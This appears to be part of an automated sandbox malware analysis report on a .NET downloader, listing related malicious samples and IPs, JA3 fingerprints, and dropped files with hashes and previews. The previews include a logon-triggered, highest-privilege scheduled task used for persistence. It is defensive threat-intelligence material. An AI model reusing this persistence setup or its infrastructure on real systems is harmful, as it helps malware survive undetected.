                                                                                                                                                                                            target.dll.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 91.211.247.198
                                                                                                                                                                                            target.dll.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 91.211.247.198
                                                                                                                                                                                            https://storage.googleapis.com/ibhsalestopw/hreeflink.html#?Z289MSZzMT0xOTA0MzgwJnMyPTY0MzU5MTI4JnMzPUdMQg==Get hashmaliciousPhisherBrowse
                                                                                                                                                                                            • 185.34.52.226
                                                                                                                                                                                            https://storage.googleapis.com/ibhsalestopw/hreeflink.html#?Z289MSZzMT0xOTA4OTYzJnMyPTY0MzU5MTI4JnMzPUdMQg==Get hashmaliciousPhisherBrowse
                                                                                                                                                                                            • 185.34.52.226
                                                                                                                                                                                            https://storage.googleapis.com/fonews/tracking.html#4FnEbI75687mvlz37qyjwgfznov1060BUBAWJDTIXNIQXO135562/9413s20Get hashmaliciousPhisherBrowse
                                                                                                                                                                                            • 185.80.128.14
                                                                                                                                                                                            https://storage.googleapis.com/ibhsalestopw/hreeflink.html#?Z289MSZzMT0xOTA4OTYzJnMyPTY0MzU5MTI4JnMzPUdMQg==Get hashmaliciousPhisherBrowse
                                                                                                                                                                                            • 185.34.52.226
                                                                                                                                                                                            https://hovi.zocsc.top/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 185.34.52.192
                                                                                                                                                                                            https://sacasqr3r3wesdgdzx.blob.core.windows.net/cdaswqrs242asdsasa/mhdihjhjudiuas.htmlGet hashmaliciousPhisherBrowse
                                                                                                                                                                                            • 185.80.130.135
                                                                                                                                                                                            TUT-ASUSfile.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            DHL-AWB#TRACKING907853880911.batGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            Ref_50102_607.7z.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            RTGS-WB-ABS-240730-NEW.lnkGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            Payment.jsGet hashmaliciousWSHRATBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            17273903480db0ad761710af8e624417944f4f8d39d0a8e65a343113de75e06efab5a25c3f534.dat-decoded.exeGet hashmaliciousClipboard Hijacker, QuasarBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            file.exeGet hashmaliciousQuasar, WhiteSnake StealerBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            REQUEST FOR QUOTATION.jsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            DSR0987678900000.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                            Proof Of Payment.jsGet hashmaliciousWSHRATBrowse
                                                                                                                                                                                            • 208.95.112.1

                                                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                            3b5074b1b5d032e5620f69f9f700ff0ehttps://johnjay.jjay.cuny.edu/phone_directory/redirect.php?profiles=https%3A%2F%2Fgoogle.com%2Famp%2Fs%2Fmmakc.com%2FblackGet hashmaliciousHtmlDropperBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            report_209.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            Shipping documents 000309498585956000797900.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            https://www.pineapplehospitality.net/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            file.exeGet hashmaliciousAmadey, BitCoin Miner, SilentXMRMinerBrowse
                                                                                                                                                                                            • 149.154.167.220

                                                                                                                                                                                            Dropped Files

                                                                                                                                                                                            No context

                                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_0LpFv1haTA.exe_308cea159c14f9b5b03db652f16eb04856bea_a7b8af99_77488a70-eb7c-42ac-8dd0-e13389be6d52\Report.wer

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                            Entropy (8bit):1.3869849168768467
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:T1oaQv4uZ4V4LSaJ7rW+czuiF3Y4lO85:T1qZG4LSa5/czuiF3Y4lO8
                                                                                                                                                                                            MD5:F5E933C9FBEA0E156B92399D252EBFF6
                                                                                                                                                                                            SHA1:1C38691A93E5C9DF0029FD49EEFE9F4BBDA20B99
                                                                                                                                                                                            SHA-256:D601BAC5C649E6003EB2B54052A1500DEB45C89741BA46504E8EE08BED830471
                                                                                                                                                                                            SHA-512:3FF2FE4009E704E4400DA3B7FFB7107BC5403CDC16CC6863497F4599DEB3E9E95B69D49CF36323E4C4B86C94CB86F036751FB6BD1C9A29C0566122B4A74C22F4
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.9.4.6.0.3.8.2.9.2.1.5.0.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.1.9.4.6.0.3.9.3.3.9.0.1.3.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.7.4.8.8.a.7.0.-.e.b.7.c.-.4.2.a.c.-.8.d.d.0.-.e.1.3.3.8.9.b.e.6.d.5.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.8.9.4.c.2.6.1.-.8.d.6.3.-.4.c.e.9.-.a.5.7.f.-.2.1.9.3.5.a.4.6.5.3.1.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.0.L.p.F.v.1.h.a.T.A...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.I.4.0.2.1.f.b.5.6.e.8.c.b.7.c.b.0.4.8.9.b.d.c.1.0.9.7.9.d.d.a...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.7.c.-.0.0.0.1.-.0.0.1.4.-.0.e.4.e.-.c.9.0.3.2.4.1.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.3.f.4.d.f.e.5.8.4.8.6.b.0.3.f.9.d.7.6.2.d.7.5.d.f.d.f.5.3.9.e.0.0.0.0.0.0.0.0.!.0.0.0.0.b.8.b.3.6.4.9.d.9.5.9.5.2.4.d.f.2.c.4.e.8.a.9.4.4.3.4.f.c.

                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER895A.tmp.dmp

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                            File Type:Mini DuMP crash report, 16 streams, Fri Sep 27 21:27:18 2024, 0x1205a4 type
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):932595
                                                                                                                                                                                            Entropy (8bit):3.106901083873908
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:/WpKl5KcXY3KdlFK1xSNFSK4HT7qdE0Wv3Qq1pBwv:l5KcXY4D6MNwzHT7qQQ
                                                                                                                                                                                            MD5:03BC643F8DF5E65532EC49A0D42695F7
                                                                                                                                                                                            SHA1:6C15E5DCCA6CE1A77F466FACBB79B7983E335098
                                                                                                                                                                                            SHA-256:EF33AE0059DF13A92E26FB38643F8FC9E549F10187503929D384E90B2E1C8CBF
                                                                                                                                                                                            SHA-512:DE4726E0428F6ACBADD989605F72EBBB2DE0F8596A5D0CDBF367741D5600A9930710F3416B5582926FADED827758F7E6AAC595042E3BB462B03F954FA5853F2D
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:MDMP..a..... .......6#.f.........................&..........<...x2...........2......Tv..............l.......8...........T...........h...............xQ..........dS..............................................................................eJ.......S......Lw......................T.......|.../#.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER8CA6.tmp.WERInternalMetadata.xml

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):9062
                                                                                                                                                                                            Entropy (8bit):3.708181067179565
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:R6l7wVeJgMKv6YEhw0sgmfZl2VPprs89bWrlQfrtQTm:R6lXJzKv6YE2/gmfr2VLWrifaK
                                                                                                                                                                                            MD5:6F58D5ED16B2C390B0C9E5969A28EDD5
                                                                                                                                                                                            SHA1:151EB92FA5D8D340E2A033FACCA436DE73A79A06
                                                                                                                                                                                            SHA-256:CCFFB6050D791DBD724C6F43E0B363D1BB710D0A999F02FB9855ECB007D80AEC
                                                                                                                                                                                            SHA-512:A6FABB5A4A3F2B4D60DB570ECA04B4DC337F16979C2D042289E9709BEACD90F7F73A1EF6DB7A8A306CC930CF3901A64F42ABD2AD13C5827CEB278DCE250C1DBC
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.5.0.0.<./.P.i.

                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER8CE6.tmp.xml

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):4829
                                                                                                                                                                                            Entropy (8bit):4.48994469633414
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:cvIwWl8zsfJg771I9EAYXWpW8VYj3Ym8M4J8qHFWEyq8vnq5uPjtz2qd:uIjfBI7+X7VzJToEWq58jd2qd
                                                                                                                                                                                            MD5:61E7A8CD0FE8ACFB2EB0399DE79BB4BA
                                                                                                                                                                                            SHA1:3627C4F623DC92498D3641223F1063D1846A63B3
                                                                                                                                                                                            SHA-256:0BF981786D75DD515BF296AF81EC9DB002FABF29677DC95B33F5D25BB3A8A828
                                                                                                                                                                                            SHA-512:1CFCF656F861015266E2A375D9E5C4F66BA3833B480C094651781BB4BA1A75D586B7278A850300ED45891EC4CDE06995C4FF8447B575DFB06967EAB19D8A3E52
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="519150" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                            C:\Users\user\.ssh\known_hosts

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\System32\OpenSSH\ssh.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (404), with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):406
                                                                                                                                                                                            Entropy (8bit):5.90555968999191
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:TyFqFcWmedrh+bMcBVM5uUkZq0lbUMO9wHWSSlICnoF/:dmgSbMcBVM5A409Kw1SlIQ+/
                                                                                                                                                                                            MD5:EC266D309CBAD86B3E4939F2117DFE39
                                                                                                                                                                                            SHA1:CF12599FBDC167B4C01B518A0BD63D51CD83798B
                                                                                                                                                                                            SHA-256:2F8ECCA5380615BCD1530817933A7EA03D2D4FDC7D6E634829AA54E40413B05D
                                                                                                                                                                                            SHA-512:D2D39D9174F459146DE57C205979E7815829C37EAFD214CDCE88F90A961F04E5468290E530CF31B9B621276A86EB3A071BBF3464962E1A8E44A7478794571BAA
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:serveo.net,138.68.79.95 ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDxYGqSKVwJpQD1F0YIhz+bd5lpl7YesKjtrn1QD1RjQcSj724lJdCwlv4J8PcLuFFtlAA8AbGQju7qWdMN9ihdHvRcWf0tSjZ+bzwYkxaCydq4JnCrbvLJPwLFaqV1NdcOzY2NVLuX5CfY8VTHrps49LnO0QpGaavqrbk+wTWDD9MHklNfJ1zSFpQAkSQnSNSYi/M2J3hX7P0G2R7dsUvNov+UgNKpc4n9+Lq5Vmcqjqo2KhFyHP0NseDLpgjaqGJq2Kvit3QowhqZkK4K77AA65CxZjdDfpjwZSuX075F9vNi0IFpFkGJW9KlrXzI4lIzSAjPZBURhUb8nZSiPuzj..

                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\0LpFv1haTA.exe.log

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\0LpFv1haTA.exe
                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                            Category:modified
                                                                                                                                                                                            Size (bytes):847
                                                                                                                                                                                            Entropy (8bit):5.354334472896228
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:ML9E4KQEAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoM:MxHKQEAHKKkKYHKGSI6oPtHTH0
                                                                                                                                                                                            MD5:578A9969E472E71F38254887263D82A4
                                                                                                                                                                                            SHA1:8ED7FC31B0F6660DBAC702BC603FBF4FE88B2F5D
                                                                                                                                                                                            SHA-256:AB8369CDA9CB7709E00867CE5460553393ABF742CBD58501AD6113FDF884B938
                                                                                                                                                                                            SHA-512:E55F7150298EF037848826E79EB72AD03D3D75C278D91CF0EA6AE3C04B89D4ABBD7BD2D5EB274715687012B90F51D53056F01CDBF5DDBB602711E66909C8BD87
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..

                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\manager.exe.log

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\manager.exe
                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):226
                                                                                                                                                                                            Entropy (8bit):5.360398796477698
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
                                                                                                                                                                                            MD5:3A8957C6382192B71471BD14359D0B12
                                                                                                                                                                                            SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
                                                                                                                                                                                            SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
                                                                                                                                                                                            SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

                                                                                                                                                                                            C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\0LpFv1haTA.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):9593944
                                                                                                                                                                                            Entropy (8bit):0.16956859276947892
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:YaHDgOV/hchoS9bFr/l2Z40o6MLKkZPDOxAWP0:YmM8/DS9bF7knxMFb7D
                                                                                                                                                                                            MD5:1BAFB4856A31AE27271FBD2EE1574A4F
                                                                                                                                                                                            SHA1:B8B3649D959524DF2C4E8A94434FC0DE90F95005
                                                                                                                                                                                            SHA-256:91CFD0498B16D33890D8D4F4F1B69DAAAD5D703F898F46B811F73E92BE19E5FF
                                                                                                                                                                                            SHA-512:E71E6AB8F548C379F49AE60E8A179ED13D41A9E9862707F15513AF083F754A4585B1567491BC08ECBBD3FB700E307B8114600C9AED297932A34B5F0FE1CEBE25
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Yara Hits:
                                                                                                                                                                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe, Author: Joe Security
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 82%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....y..........."...0.................. ... ....@.. .......................`............`.................................P...K.... ..................XH...@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......0... <......5...................................................PK..........................................5...P...n...w...{...................................................................|.......................8...K.......................[......."...#...&...'...........=.......F.......8...............2...p...s...a............ ...#...'...+...c...i...i...i...i..PK......PK......PK......PK..F...o .....(r....*".(s....*.s,.... ...*.(&....*~(....ou....#...~#...(3....$.

                                                                                                                                                                                            C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe:Zone.Identifier

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\0LpFv1haTA.exe
                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):26
                                                                                                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\helloworld.txt

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                            Category:modified
                                                                                                                                                                                            Size (bytes):120
                                                                                                                                                                                            Entropy (8bit):4.587442566550768
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:BOzReCWAMb7iDRVivmjaZjEQlyrWRYAdMKq8QFKxrg5bvn:UaXiDRAsa5EQlyrKKv6c5bvn
                                                                                                                                                                                            MD5:70A59A9D883092E5145E13803001BB32
                                                                                                                                                                                            SHA1:84F0DCDF0BE7B6E49267140294E6AB2052B9D0CC
                                                                                                                                                                                            SHA-256:3F6D07E6D89BA8F853BF82CAC6EF12AF8D706382FA1B9357277C2EBE40C5AD4D
                                                                                                                                                                                            SHA-512:216D00DA15708313DF61E771AA4BB76552DEDF24E156ED548052406C8FC6CA50697C087ADD5F89C79CAE6852224E02C83D4E5A7C44CF038DA1818A7B8C98EE92
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:Failed to listen on prefix 'http://127.0.0.1:7634/' because it conflicts with an existing registration on the machine...

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmp4A67.tmp

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\XenoManager\manager.exe
                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1044
                                                                                                                                                                                            Entropy (8bit):3.8466327629336408
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:FLJ+DW2SFFkFmMMLGId1L6AEJl7XpShhJKShe/Q0QK1++SHANGdxv3n:FLJ+S3Mmd1L6ztMhEMOQ0Q+exvn
                                                                                                                                                                                            MD5:19D4F3ABEF0C50004938843716F3D1BA
                                                                                                                                                                                            SHA1:2FF937A259D44713C9D4A806B168B71C1A784A37
                                                                                                                                                                                            SHA-256:0E6143F0A03A29E6C85AF08A3201F12EF973C2DC345D11DA351CB9AB4E4BE1E5
                                                                                                                                                                                            SHA-512:0534910056F99FBAE57EB74531D0F76628BE086E028F7B7955A991DFFAB85EE551237F20676A1915D6A7148ABCB3A55B89705EFC917219E71746C59A9ACDE9CA
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Preview:. <Task xmlns='http://schemas.microsoft.com/windows/2004/02/mit/task'>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id='Author'>. <LogonType>InteractiveToken</LogonType>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. </Settings>. <Actions>. <Exec>. <Command>C:\Users\user\AppData\Roaming\XenoManager\manager.exe</Command>. </Exec>.

                                                                                                                                                                                            C:\Users\user\AppData\Local\phgsswc3mw\p.dat

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                            Entropy (8bit):2.0
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:gWRn:gWR
                                                                                                                                                                                            MD5:77BB14F6132EA06DEA456584B7D5581E
                                                                                                                                                                                            SHA1:21B0746663912640F512EEEF58747ED112822CCD
                                                                                                                                                                                            SHA-256:2661AF8C7851227D66CD18F2EBB4B440EB16286BF05978AF500068F9F5475687
                                                                                                                                                                                            SHA-512:95D51211C2CC0BE87803A2DEEE6AA6B42B8CBFCB4F5122692988995D1CBB85EDCF67997CC891DC07AD09752FBCDEAD7F657653701EF94D65F45E6CD7CBDBF223
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:7634

                                                                                                                                                                                            C:\Users\user\AppData\Local\phgsswc3mw\report.lock

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
                                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:1

                                                                                                                                                                                            C:\Users\user\AppData\Roaming\XenoManager\manager.exe

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\manager.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):52224
                                                                                                                                                                                            Entropy (8bit):5.65707909998987
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:vivdjHrddilbVauou79EoY42qCTBVwHJdSkGu2yPo+LGZYebFDaUV6RNSgNOv:opHmVauo3hv1VEnj6CSYebFlUf4v
